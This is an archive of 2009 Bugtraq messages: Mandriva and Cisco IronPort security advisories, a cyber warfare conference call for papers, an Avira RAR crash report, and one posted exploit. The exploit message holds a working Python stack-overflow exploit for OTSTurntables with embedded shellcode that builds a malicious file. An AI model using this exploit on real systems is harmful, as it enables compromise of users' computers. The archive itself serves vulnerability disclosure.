Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 0B666EC122
for <lists@securityspace.com>; Wed, 14 Jan 2009 13:52:47 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 0948F2373BC; Wed, 14 Jan 2009 09:18:12 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 26763 invoked from network); 14 Jan 2009 06:42:51 -0000
X-Cloudmark-SP-Filtered: true
X-Cloudmark-SP-Result: v=1.0 c=0 a=FLhA3KDuAAAA:8 a=sMBj6sIwAAAA:8 a=O7S8s7giyhVwt4s-9NoA:9 a=_ep76ymyat71F24U2foA:7 a=twaoudnO3fsgLv5R-1XwrxcYtS0A:4 a=PRHNZNJDFyAA:10 a=R2VQutpenNgA:10 a=8UiCvUyRy1oA:10
To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:010 ] qemu
Date: Wed, 14 Jan 2009 00:13:01 -0700
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1LMzvx-0005By-0Z@titan.mandriva.com>
Status:   


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:010
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : qemu
 Date    : January 14, 2009
 Affected: 2008.0, 2008.1
 _______________________________________________________________________

 Problem Description:

 A security vulnerability have been discovered and corrected
 in VNC server of qemu 0.9.1 and earlier, which could lead to a
 denial-of-service attack (CVE-2008-2382).
 
 The updated packages have been patched to prevent this.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2382
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2008.0:
 d18f37c8afe834fc75b8d20fd739c35e  2008.0/i586/dkms-kqemu-1.3.0-0.pre11.13.3mdv2008.0.i586.rpm
 90ac7511cb7b1ef350b0edeaddcbb61c  2008.0/i586/qemu-0.9.0-16.3mdv2008.0.i586.rpm
 14fb383247d38fa1625384e8a5c07106  2008.0/i586/qemu-img-0.9.0-16.3mdv2008.0.i586.rpm 
 7a7c649d2c0e033767a8f891491fa11a  2008.0/SRPMS/qemu-0.9.0-16.3mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 a199c71663339ff512fc286287aa393f  2008.0/x86_64/dkms-kqemu-1.3.0-0.pre11.13.3mdv2008.0.x86_64.rpm
 d6ad774c00ab0f8d7583d6903d845bda  2008.0/x86_64/qemu-0.9.0-16.3mdv2008.0.x86_64.rpm
 d7dfcf881def049285be2f22cb430d8b  2008.0/x86_64/qemu-img-0.9.0-16.3mdv2008.0.x86_64.rpm 
 7a7c649d2c0e033767a8f891491fa11a  2008.0/SRPMS/qemu-0.9.0-16.3mdv2008.0.src.rpm

 Mandriva Linux 2008.1:
 0b47bf7f27ba348045e167c2e3c69119  2008.1/i586/dkms-kqemu-1.3.0-0.pre11.15.3mdv2008.1.i586.rpm
 66202d0f349f70cf8ac1289bb5e70708  2008.1/i586/qemu-0.9.0-18.3mdv2008.1.i586.rpm
 b2ed2e31823f48695a97f8bbc506e7f6  2008.1/i586/qemu-img-0.9.0-18.3mdv2008.1.i586.rpm 
 5f7d176cfba6e6b262c14de369eb60e1  2008.1/SRPMS/qemu-0.9.0-18.3mdv2008.1.src.rpm

 Mandriva Linux 2008.1/X86_64:
 2111acd253c95c5633f5389dedf7af1d  2008.1/x86_64/dkms-kqemu-1.3.0-0.pre11.15.3mdv2008.1.x86_64.rpm
 dd1b9f85874c290458fa4b7943c233ee  2008.1/x86_64/qemu-0.9.0-18.3mdv2008.1.x86_64.rpm
 e22ca1a87a2a41f8f306da778b15e5f0  2008.1/x86_64/qemu-img-0.9.0-18.3mdv2008.1.x86_64.rpm 
 5f7d176cfba6e6b262c14de369eb60e1  2008.1/SRPMS/qemu-0.9.0-18.3mdv2008.1.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJbWPlmqjQ0CJFipgRAnvHAJoD0Inft9/2qDupdRM8u0nBQs81bgCgo28B
qXNv6NOXGtRSPKGNS0Acc3o=DHda
-----END PGP SIGNATURE-----

From - Wed Jan 14 14:12:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058e1
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39168-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id B9C08EC14A
for <lists@securityspace.com>; Wed, 14 Jan 2009 14:03:34 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 968182373C0; Wed, 14 Jan 2009 09:18:48 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 28215 invoked from network); 14 Jan 2009 07:45:12 -0000
Date: 14 Jan 2009 08:08:57 -0000
Message-ID: <20090114080857.2258.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: kgconference@gmail.com
To: bugtraq@securityfocus.com
Subject: Call for Papers: Cyber Warfare
Status:   

-----

Call for Papers!

Conference on Cyber Warfare

June 17-19, 2009

Tallinn, Estonia

The Cooperative Cyber Defence Centre of Excellence is hosting a Conference on Cyber Warfare in 2009.  

CCD CoE is soliciting research papers within the emerging field of cyber warfare, including but not limited to the following topics:

#  Concepts and Doctrine
#  Technical Challenges and Solutions
#  Strategic Analysis
#  Cooperative Cyber Defence
#  Lessons Learned
#  Proofs of Concept
#  The Future

The Selection Committee seeks submissions from academia and the professional world that offer an original and substantial contribution toward understanding conflict in cyberspace.

Authors should send a one-page abstract to cfp@ccdcoe.org between January 1 and March 15, 2009.

The Selection Committee will notify all authors of its decisions ASAP following submission but NLT April 1.

Final papers are due May 15, 2009.  They will be presented at the conference by the author and published in the conference proceedings.

Keynote Speakers include:
James Lewis (CSIS) "Securing Cyberspace for the 44th Presidency"
Mikko Hypponen (F-Secure) Chief Research Officer

Conference registration information will be posted by February 1 at www.ccdcoe.org.

Questions regarding this conference may be sent to cwcon@ccdcoe.org from January 1, 2009. 

Conference Manager:

Kenneth Geers, CCD CoE Scientist

-----

From - Wed Jan 14 14:12:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058e2
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39176-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 14E78EC14A
for <lists@securityspace.com>; Wed, 14 Jan 2009 14:12:08 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 8A535236F9F; Wed, 14 Jan 2009 10:51:05 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 9379 invoked from network); 14 Jan 2009 16:48:27 -0000
X-TACSUNS: Virus Scanned
Sender: nobody@cisco.com
From: Cisco Systems Product Security Incident Response Team <psirt@cisco.com>
To: bugtraq@securityfocus.com
Cc: psirt@cisco.com
Subject: Cisco Security Advisory: IronPort Encryption Appliance / PostX and PXE Encryption Vulnerabilities
Date: Wednesday, 14 January 2009 11:15:00 -0600 
Message-id: <200901141115.ironport@psirt.cisco.com>
Reply-To: psirt@cisco.com
Errors-To: nobody@cisco.com
MIME-Version: 1.0
Content-Type: Text/Plain; charset="us-ascii"
Content-Transfer-Encoding: 8bit
Prevent-NonDelivery-Report: 
Content-Return: Prohibited
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cisco Security Advisory: IronPort Encryption Appliance / PostX and
                         PXE Encryption Vulnerabilities

Advisory ID: cisco-sa-20090114-ironport

Revision 1.0

For Public Release 2009 January 14 1600 UTC (GMT)

+---------------------------------------------------------------------

Summary
======
IronPort PXE Encryption is an e-mail encryption solution that is
designed to secure e-mail communications without the need for a
Public Key Infrastructure (PKI) or special agents on receiving
systems. When an e-mail message is targeted for encryption, the PXE
encryption engine on an IronPort e-mail gateway encrypts the original
e-mail message as an HTML file and attaches it to a notification
e-mail message that is sent to the recipient. The per-message key
used to decrypt the HTML file attachment is stored on a local
IronPort Encryption Appliance, PostX software installation or the
Cisco Registered Envelope Service, which is a Cisco-managed software
service.

PXE Encryption Privacy Vulnerabilities
+-------------------------------------

The IronPort PXE Encryption solution is affected by two
vulnerabilities that could allow unauthorized individuals to view the
contents of secure e-mail messages. To exploit the vulnerabilities,
attackers must first intercept secure e-mail messages on the network
or via a compromised e-mail account.

IronPort Encryption Appliance Administration Interface Vulnerabilities
+---------------------------------------------------------------------

IronPort Encryption Appliance devices contain two vulnerabilities
that could allow unauthorized users to gain access to the IronPort
Encryption Appliance administration interface and modify other users'
settings. These vulnerabilities do not affect Cisco Registered
Envelope Service users.

Cisco has released free software updates that address these
vulnerabilities. There are no workarounds for the vulnerabilities
that are described in this advisory.

This advisory is posted at:

http://www.cisco.com/warp/public/707/cisco-sa-20090114-ironport.shtml

Affected Products
================
Vulnerable Products
+------------------

The following IronPort Encryption Appliance/PostX versions are
affected by these vulnerabilities:

  * All PostX 6.2.1 versions prior to 6.2.1.1
  * All PostX 6.2.2 versions prior to 6.2.2.3
  * All IronPort Encryption Appliance/PostX 6.2.4 versions prior to 6.2.4.1.1
  * All IronPort Encryption Appliance/PostX 6.2.5 versions
  * All IronPort Encryption Appliance/PostX 6.2.6 versions
  * All IronPort Encryption Appliance/PostX 6.2.7 versions prior to 6.2.7.7
  * All IronPort Encryption Appliance 6.3 versions prior to 6.3.0.4
  * All IronPort Encryption Appliance 6.5 versions prior to 6.5.0.2

The version of software that is running on an IronPort Encryption
Appliance is located on the About page of the IronPort Encryption
Appliance administration interface.

Note: Customers should contact IronPort support to determine which
software fixes are applicable for their environment. Please consult
the Obtaining Fixed Software section of this advisory for more
information.

Products Confirmed Not Vulnerable
+--------------------------------

IronPort C, M and S-Series appliances are not affected by these
vulnerabilities. Although C-Series appliances can be configured to
use a local IronPort Encryption Appliance for per-message key
retention, the C-Series appliances are not vulnerable. The Cisco
Registered Envelope Service is not vulnerable.

No other Cisco products are currently known to be affected by these
vulnerabilities.

Details
======
Note: IronPort tracks bugs using an internal system that is not
available to customers. The IronPort bug tracking identifiers are
provided for reference only.

PXE Encryption Privacy Vulnerabilities
+-------------------------------------

Individual PXE Encryption users are vulnerable to two message privacy
vulnerabilities that could allow an attacker to gain access to
sensitive information. All the vulnerabilities require an attacker to
first intercept a secure e-mail message as a condition for successful
exploitation. Attackers can obtain secure e-mail messages by
monitoring a network or a compromised user e-mail account.

The IronPort Encryption Appliance contains a logic error that could
allow an attacker to obtain the unique, per-message decryption key
that is used to protect the content of an intercepted secure e-mail
message without user interaction. Using the decryption key, an
attacker could decrypt the contents of the secure e-mail message.
This vulnerability is documented in IronPort bug 8062 and has been
assigned Common Vulnerabilities and Exposures (CVE) identifier
CVE-2009-0053.

By modifying the contents of intercepted secure e-mail messages or by
forging a close copy of the e-mail message, it may be possible for an
attacker to convince a user to view a modified secure e-mail message
and then cause the exposure of the user's credentials and message
content. Please see the Workarounds section for more information on
mitigations available to reduce exposure to these phishing-style
attacks. This vulnerability is documented in IronPort bug 8149 and
has been assigned Common Vulnerabilities and Exposures (CVE)
identifier CVE-2009-0054.

IronPort Encryption Appliance Administration Interface Vulnerabilities
+---------------------------------------------------------------------

The administration interface of IronPort Encryption Appliance devices
contains a cross-site request forgery (CSRF) vulnerability that could
allow an attacker to modify a user's IronPort Encryption Appliance
preferences, including their user name and personal security pass
phrase, if the user is logged into the IronPort Encryption Appliance
administration interface. Exploitation of the vulnerability will not
allow an attacker to change a user's password. This vulnerability is
documented in IronPort bug 5806 and has been assigned Common
Vulnerabilities and Exposures (CVE) identifier CVE-2009-0055.

The administration interface of IronPort Encryption Appliance devices
also contains a cross-site request forgery (CSRF) vulnerability that
could allow an attacker to execute a command and modify a user's
IronPort Encryption Appliance preferences, including their user name
and personal security pass phrase, under certain circumstances when a
user logs out of the IronPort Encryption Appliance administration
interface. Exploitation of the vulnerability will not allow an
attacker to change a user's password. This vulnerability is
documented in IronPort bug 6403 and has been assigned Common
Vulnerabilities and Exposures (CVE) identifier CVE-2009-0056.

Vulnerability Scoring Details
============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding
CVSS at:

http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:

http://intellishield.cisco.com/security/alertmanager/cvss

PXE Encryption Message Decryption Vulnerability - IronPort Bug 8062

CVSS Base Score - 7.1
    Access Vector - Network
    Access Complexity - Medium
    Authentication - None
    Confidentiality Impact - Complete
    Integrity Impact - None
    Availability Impact - None

CVSS Temporal Score - 5.9
    Exploitability - Functional
    Remediation Level - Official Fix
    Report Confidence - Confirmed

PXE Encryption Phishing Vulnerabilities - IronPort Bug 8149

CVSS Base Score - 6.1
    Access Vector - Network
    Access Complexity - High
    Authentication - None
    Confidentiality Impact - Complete
    Integrity Impact - Partial
    Availability Impact - None

CVSS Temporal Score - 5
    Exploitability - Functional
    Remediation Level - Official Fix
    Report Confidence - Confirmed

IronPort Encryption Appliance CSRF Vulnerability - IronPort Bug 5806

CVSS Base Score - 5.8
    Access Vector - Network
    Access Complexity - Medium
    Authentication - None
    Confidentiality Impact - Partial
    Integrity Impact - Partial
    Availability Impact - None

CVSS Temporal Score - 4.8
    Exploitability - Functional
    Remediation Level - Official Fix
    Report Confidence - Confirmed

IronPort Encryption Appliance Logout Action CSRF Vulnerability - IronPort Bug 6403

CVSS Base Score - 5.8
    Access Vector - Network
    Access Complexity - Medium
    Authentication - None
    Confidentiality Impact - Partial
    Integrity Impact - Partial
    Availability Impact - None

CVSS Temporal Score - 4.8
    Exploitability - Functional
    Remediation Level - Official Fix
    Report Confidence - Confirmed

Impact
=====
PXE Encryption Privacy Vulnerabilities
+-------------------------------------

Successful exploitation of these vulnerabilities could allow an
attacker to obtain user credentials and view the contents of
intercepted secure e-mail messages, which could result in the
disclosure of sensitive information.

IronPort Encryption Appliance Administration Interface Vulnerabilities
+---------------------------------------------------------------------

Successful exploitation of these vulnerabilities could allow an
attacker to access user accounts on an IronPort Encryption Appliance
device, which could result in the modification of user preferences.

Software Versions and Fixes
==========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to determine
exposure and a complete upgrade solution.

Workarounds
==========
There are no workarounds for the vulnerabilities that are described
in this advisory.

There are mitigations available to help prevent exploitation of the
PXE Encryption phishing-style vulnerability. Phishing attacks can be
greatly reduced if DomainKeys Identified Mail (DKIM) and Sender
Policy Framework (SPF) are implemented on IronPort e-mail gateways to
help ensure message integrity and source origin. Additionally, the
PXE Encryption solution contains an anti-phishing Secure Pass Phrase
feature to ensure that secure notification e-mail messages are valid.
This feature is enabled by recipients when configuring their PXE user
profile. Cisco has released a best practices document that describes
several techniques to mitigate against the phishing-style attacks
that is available at the following link:

http://www.cisco.com/web/about/security/intelligence/bpiron.html

Obtaining Fixed Software
=======================
Cisco has released free software updates that address these
vulnerabilities. The affected products in this advisory are directly
supported by IronPort, and not via the Cisco TAC organization.
Customers should contact IronPort technical support at the link below
to obtain software fixes. IronPort technical support will assist
customers in determining the correct fixes and installation
procedures. Customers should direct all warranty questions to
IronPort technical support.

Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.

http://www.ironport.com/support/contact_support.html

Exploitation and Public Announcements
====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities that are described in this advisory.

J.B. Snyder of Brintech reported a method for obtaining PXE
Encryption user credentials via a phishing-style attack to Cisco.

All other vulnerabilities were discovered by Cisco or reported by
customers.

Status of this Notice: FINAL
===========================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.

A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.

Distribution
===========
This advisory is posted on Cisco's worldwide website at:

http://www.cisco.com/warp/public/707/cisco-sa-20090114-ironport.shtml

In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.

  * cust-security-announce@cisco.com
  * first-bulletins@lists.first.org
  * bugtraq@securityfocus.com
  * vulnwatch@vulnwatch.org
  * cisco@spot.colorado.edu
  * cisco-nsp@puck.nether.net
  * full-disclosure@lists.grok.org.uk
  * comp.dcom.sys.cisco@newsgate.cisco.com

Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.

Revision History
===============
+---------------------------------------+
| Revision |                 | Initial  |
| 1.0      | 2009-January-14 | public   |
|          |                 | release  |
+---------------------------------------+

Cisco Security Procedures
========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at:

http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html

This includes instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at:

http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (SunOS)

iD8DBQFJbhoo86n/Gc8U/uARAjuxAJ4oLc1JjS7N9728Ueb6JB7Y2LVJtACfaSfA
A6WIz481vajHya3jIlp+/XcJ6
-----END PGP SIGNATURE-----

From - Wed Jan 14 14:22:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058e3
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39177-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 62803EC14A
for <lists@securityspace.com>; Wed, 14 Jan 2009 14:22:16 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 93348236FC1; Wed, 14 Jan 2009 10:52:07 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 9573 invoked from network); 14 Jan 2009 16:50:50 -0000
Date: 14 Jan 2009 17:14:39 -0000
Message-ID: <20090114171439.13264.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: crimson.loyd@gmail.com
To: bugtraq@securityfocus.com
Subject: OTSTurntables 1.00.027 (.ofl) Local Stack Overflow Exploit
Status:   

#  OTSTurntables 1.00.027 (.ofl) Local Stack Overflow Exploit
#  Discovered & exploited bY suN8Hclf
#  crimson.loyd@gmail.com, blacksideofthesun.linuxsecured.net
#  Tested on: Windows XP SP2 Polish Full patched
#  
#  Only 274 bytes for shellcode. Wanna more, exploit SEH !!!
#
#  Thanks to Myo and to everyone who knows what hacking really is 
#  Not for money dude, only for fun !!!

print "====================================================================="
print " OTSTurntables 1.00.027 (.ofl) Local Stack Overflow Exploit"
print " bY suN8Hclf (crimson.loyd@gmail.com)"
print "====================================================================="

nops = "\x90" * 4
ret = "\x75\x52\x46";   # call ebx

# win32_exec -  EXITFUNC=seh CMDlc Size0 Encoder=PexFnstenvSub http://metasploit.com
shellcode = (
"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc9"
"\x2c\xc9\x40\x83\xeb\xfc\xe2\xf4\x35\xc4\x8d\x40\xc9\x2c\x42\x05"
"\xf5\xa7\xb5\x45\xb1\x2d\x26\xcb\x86\x34\x42\x1f\xe9\x2d\x22\x09"
"\x42\x18\x42\x41\x27\x1d\x09\xd9\x65\xa8\x09\x34\xce\xed\x03\x4d"
"\xc8\xee\x22\xb4\xf2\x78\xed\x44\xbc\xc9\x42\x1f\xed\x2d\x22\x26"
"\x42\x20\x82\xcb\x96\x30\xc8\xab\x42\x30\x42\x41\x22\xa5\x95\x64"
"\xcd\xef\xf8\x80\xad\xa7\x89\x70\x4c\xec\xb1\x4c\x42\x6c\xc5\xcb"
"\xb9\x30\x64\xcb\xa1\x24\x22\x49\x42\xac\x79\x40\xc9\x2c\x42\x28"
"\xf5\x73\xf8\xb6\xa9\x7a\x40\xb8\x4a\xec\xb2\x10\xa1\xdc\x43\x44"
"\x96\x44\x51\xbe\x43\x22\x9e\xbf\x2e\x4f\xa8\x2c\xaa\x02\xac\x38"
"\xac\x2c\xc9\x40"
    )
num = 276 - 4 - 160
buff = "\x41" * num

exploit = nops + shellcode + buff + ret
try:
    out_file = open("open_me.ofl",'w')
    out_file.write(exploit)
    out_file.close()
    raw_input("\nNow open open_me.ofl file to exploit bug!\n")
except:
    print "WTF?"

From - Wed Jan 14 14:32:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058e4
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39178-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 6FE5BEC14A
for <lists@securityspace.com>; Wed, 14 Jan 2009 14:32:08 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 39269236F3F; Wed, 14 Jan 2009 10:52:44 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 9765 invoked from network); 14 Jan 2009 16:52:34 -0000
Date: Wed, 14 Jan 2009 18:15:49 +0100
From: Thierry Zoller <Thierry@Zoller.lu>
Reply-To: Thierry Zoller <Thierry@Zoller.lu>
Organization: Kachkeis CoKG
X-Priority: 3 (Normal)
Message-ID: <1603724654.20090114181549@Zoller.lu>
To: NTBUGTRAQ <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>,
bugtraq <bugtraq@securityfocus.com>,
full-disclosure <full-disclosure@lists.grok.org.uk>,
<info@circl.etat.lu>, <vuln@secunia.com>, <cert@cert.org>,
<nvd@nist.gov>, <cve@mitre.org>
Subject: [TZO-2009-1] Avira Antivir - RAR - Division by Zero &  Null Pointer Dereference
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-15
Content-Transfer-Encoding: 8bit
X-Originating-IP: 91.50.119.29
Status:   

______________________________________________________________________

     Avira - RAR -Division by Zero & Null Pointer Dereference
______________________________________________________________________

Reference     : [TZO-2009-1]-Avira Antivir
Location      : http://blog.zoller.lu/2009/01/advisory-tzo-2009-1-avira-antivir-rar.html
Products      : Avira Antivr Free
                Avira AntiVir Premium
                Avira Premium Security Suite
                Avira AntiVir Professional
                Avira AntiVir for KEN! 4
                Avira AntiVir & AntiSpam for KEN! 4
                Avira WebProtector for KEN! 4
                Avira AntiVir SharePoint
                Avira AntiVir Virus Scan Adapter for SAP NetWeaver
                Avira AntiVir MailGate
                Avira MailGate Suite
                Avira AntiVir Exchange
                Avira AntiVir MIMEsweeper
                Avira AntiVir Domino
                Avira AntiVir WebGate
                Avira WebGate Suite
                Avira AntiVir ISA Server
                Avira AntiVir MIMEsweeper
                Avira AntiVir Mobile
                Avira SmallBusiness Suite
                Avira Business Bundle
                Avira AntiVir NetGate Bundle
                Avira AntiVir NetWork Bundle
                Avira AntiVir GateWay Bundle
                Avira AntiVir Campus (for Education)
                                
Vendors and Products using the Avira Engine :
Important : The impact of this flaw on those devices  has  not  been
tested nor confirmed to exist, there is however  reason  to  believe
that    the    flaw    existed    in    this    products     aswell.

http://www.avira.com/documents/utils/pdf/products/pi_system-integration_en.pdf

               AXIGEN Mail Server
               Clearswift Mimesweeper
               GeNUGate and GeNUGate Pro (optional addon)
               IQ.Suite                 

Vendor        : http://www.avira.de



I. Background
~~~~~~~~~~~~~
Avira is a leading worldwide provider of  self-developed  protection
solutions for professional and private use. The company  belongs  to
the pioneers in this  sector  with  over  twenty  years  experience.

The protection experts have numerous  company  locations  throughout
Germany and cultivate partnerships in  Europe,   Asia  and  America.
Avira has more than 180 employees at their main office  in  Tettnang
near Lake Constance and is one  of  the  largest  employers  in  the
region.  There  are  around  250  people  employed  worldwide  whose
commitment is continually being confirmed by awards.  A  significant
contribution to protection is the Avira AntiVir  Personal  which  is
being  used  by   private    users    a    million    times    over.

AV-Comparatives e.V.  have  chosen  Avira  AntiVir  Premium  as  the
best anti-virus solution of 2008 

II. Description
~~~~~~~~~~~~~~~
By manipulating certain fields inside a  RAR  archive  and  attacker
might trigger division by zero and null point exceptions. The attack vector  should  be  rated as  remote  as  an  attachement  to    an    e-mail    is    enough.

*Anybody  else  noticed  that  the  amount  of  details   in    most
advisories have *become less than usefull ?*


III. Impact
~~~~~~~~~~~~~~~
In some cases the  impact  is  a  Denial  of  Service  condition  in
others to an invalid read size  of  4  bytes  which  again  in  some
cases lead to an null pointer dereference.

The RAR parser inside the  module  leads  to  various  errors  whose
exploitability index is rated "I don't have time for this now  -  so
let's say 'maybe'" also sometimes known as "I lack the  time  and/or
the skill to do so". 


FAULTING_IP: 
aepack!module_get_api+20ed9
0131cad9 8b10            mov     edx,dword ptr [eax]

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 0131cad9 (aepack!module_get_api+0x00020ed9)
   ExceptionCode: c0000005 (Access violation)
   ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000000
   Parameter[1]: 00000268
Attempt to read from address 00000268

FAULTING_THREAD:  00000144
